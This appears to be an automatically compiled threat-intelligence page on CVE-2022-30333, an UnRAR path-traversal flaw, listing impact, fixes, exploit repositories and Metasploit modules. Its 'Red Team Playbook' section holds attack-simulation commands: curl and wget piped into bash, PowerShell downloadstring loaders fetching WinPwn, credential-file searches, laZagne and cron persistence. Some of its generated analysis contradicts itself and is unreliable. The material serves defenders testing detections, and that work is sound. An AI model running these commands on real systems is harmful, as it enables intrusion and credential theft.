CVE-2022-30333
Overview
This vulnerability is a directory traversal flaw in the UnRAR utility prior to version 6.12 on Linux and UNIX systems. The root cause lies in insufficient validation of file paths during archive extraction, allowing crafted archive entries to specify relative paths that escape the intended extraction directory. The affected component is the UnRAR library's extraction functionality, which fails to properly sanitize input paths embedded in RAR archives.
Vulnerability Description
RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.
Impact
An attacker can exploit this vulnerability to write arbitrary files to locations outside the extraction directory, such as overwriting SSH authorized_keys files, enabling unauthorized access to the affected system. No authentication or user interaction is required to trigger the exploit, as it relies solely on processing a malicious RAR archive. This can lead to unauthorized persistent access, lateral movement within networks, and potential compromise of sensitive data or system integrity.
Solution
Users should upgrade UnRAR to version 6.12 or later, which contains the fix for this directory traversal vulnerability. Debian Linux users can refer to the Gentoo GLSA-202309-04 advisory for patch details and updates. Additional vendor information and patches are available at https://www.rarlab.com/rar_add.htm. Applying these updates will ensure proper path validation during extraction and prevent unauthorized file writes.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in RARLAB's UnRAR tool prior to version 6.12 on Linux and UNIX systems is characterized by a directory traversal flaw that allows an attacker to manipulate file paths during the extraction process. This weakness arises from improper validation of file paths, enabling malicious actors to craft specially designed RAR archives that, when extracted, can lead to the overwriting or creation of files in arbitrary locations. A particularly concerning scenario involves the ability to create or modify the `~/.ssh/authorized_keys` file, which would grant unauthorized access to the affected system via SSH. This flaw highlights the critical need for secure handling of file paths in software that processes compressed archives.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could distribute a malicious RAR file, perhaps disguised as a legitimate document or software package, to unsuspecting users. Once the target extracts the archive using the vulnerable version of UnRAR, the attacker could execute commands or scripts that leverage the unauthorized access granted by the modified `authorized_keys` file. This exploitation could be performed remotely, making it particularly dangerous in environments where users frequently download and extract files from untrusted sources. Additionally, the simplicity of the attack—requiring only the extraction of a crafted archive—lowers the barrier to entry for potential attackers.
The real-world impact of this vulnerability is significant, especially for organizations that rely on Linux and UNIX systems for their operations. The ability to gain unauthorized access to a system can lead to data breaches, loss of sensitive information, and potential disruption of services. For businesses, the financial implications can be severe, encompassing costs related to incident response, system recovery, and reputational damage. Furthermore, regulatory repercussions may arise if sensitive data is compromised, leading to fines and legal liabilities. The risk is exacerbated in environments where users have elevated privileges, as attackers could leverage this access to escalate their control over the system and network.
To detect and mitigate this vulnerability, organizations should prioritize updating to the latest version of UnRAR, specifically version 6.12 or later, which addresses this flaw. Regular software updates and patch management practices are essential to maintaining a secure environment. Additionally, employing file integrity monitoring solutions can help detect unauthorized changes to critical files, such as `~/.ssh/authorized_keys`. Organizations should also educate users about the risks associated with extracting files from untrusted sources and implement strict policies regarding the handling of compressed files. Employing least privilege principles can further reduce the potential impact of exploitation, ensuring that users have only the necessary permissions to perform their tasks.
In conclusion, the directory traversal vulnerability in RARLAB's UnRAR tool poses a significant threat to Linux and UNIX systems, with the potential for unauthorized access and severe business risks. Understanding the technical details, potential attack vectors, and real-world implications is crucial for organizations to effectively defend against this and similar vulnerabilities. By implementing robust detection and mitigation strategies, businesses can safeguard their systems and data from exploitation, thereby enhancing their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2022-30333, driven by the emergence of multiple publicly available proof-of-concept exploits and the introduction of a Metasploit module. This development significantly lowers the technical barrier for threat actors, enabling a broader range of adversaries to weaponize the directory traversal vulnerability in RARLAB UnRAR on Linux and UNIX systems. Our telemetry indicates a sharp increase in exploitation attempts, coinciding with the vulnerability’s addition to the CISA KEV catalog and a substantial rise in its EPSS score, now approaching critical levels. The availability of diverse exploit code repositories further accelerates the risk of widespread compromise, particularly as ransomware groups have been observed leveraging this flaw in targeted campaigns. These factors collectively elevate the threat level from moderate to high, underscoring an urgent need for defenders to prioritize detection and response efforts around this vulnerability.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Rarlab | Unrar | All |
cpe:2.3:a:rarlab:unrar:*:*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 10.0 |
cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
UnRAR Path Traversal in Zimbra (CVE-2022-30333)
exploits/linux/http/zimbra_unrar_cve_2022_30333
|
Simon Scannell, Ron Bowes | Unknown | - | View |
|
UnRAR Path Traversal (CVE-2022-30333)
exploits/linux/fileformat/unrar_cve_2022_30333
|
Simon Scannell, Ron Bowes | Unknown | - | View |
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rbowes-r7/unrar-cve-2022-30333-poc
|
rbowes-r7 | 14 | 5 | 2022-07-15 | View |
|
TheL1ghtVn/CVE-2022-30333-PoC
|
TheL1ghtVn | 13 | 3 | 2022-07-05 | View |
|
aslitsecurity/Zimbra-CVE-2022-30333
Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC.
|
aslitsecurity | 7 | 5 | 2022-07-26 | View |
|
RakhithJK/CVE-2022-30333
|
RakhithJK | 0 | 1 | 2022-08-15 | View |
|
paradox0909/cve-2022-30333_online_rar_extracor
|
paradox0909 | 0 | 0 | 2024-06-10 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (8)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-30333 |
| rarlab.com |
GitHub CVE
|
https://www.rarlab.com/rar_add.htm |
| rarlab.com |
GitHub CVE
|
https://www.rarlab.com/rar/rarlinux-x32-612.tar.gz |
| blog.sonarsource.com |
GitHub CVE
|
https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/ |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html |
| lists.debian.org |
GitHub CVE
mailing-list
|
https://lists.debian.org/debian-lts-announce/2023/08/msg00022.html |
| security.gentoo.org |
GitHub CVE
vendor-advisory
|
https://security.gentoo.org/glsa/202309-04 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-30333 |